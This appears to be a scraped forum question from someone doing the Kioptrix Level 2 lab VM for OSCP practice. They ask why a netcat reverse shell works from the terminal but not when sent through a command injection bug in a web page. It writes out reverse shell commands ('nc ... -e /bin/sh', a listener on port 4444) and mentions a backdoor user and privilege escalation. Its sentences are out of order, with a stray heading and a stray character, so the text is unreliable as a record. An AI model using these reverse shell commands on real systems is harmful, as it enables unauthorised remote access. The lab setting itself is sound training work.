Reverse shell via terminal is working fine nc -lp 4444 However, when I repeat the same process with netcat executed on Kioptrix 2 terminal, I was able to get the reverse shell setup on Kali.īackdoor user used in this was created right after I getting root access via privilege escalation bug ~]$ nc 10.10.13.37 4444 -e /bin/sh Listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Netcat reverse shell from browser full#
Tcpdump: verbose output suppressed, use -v or -vv for full protocol decode No traffic at all sudo tcpdump -nni eth0 port 4444 LISTEN 0 1 0.0.0.0:4444 0.0.0.0:* netcat reverse shell executed in web browser via command injection bug doesn't work nc 10.10.13.37 4444 I've verified tcp port 4444 is open ss -antp | g 4444 My question is why netcat reverse shell executed in web browser via command injection bug doesn't work when it was working just fine via terminal?
I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation.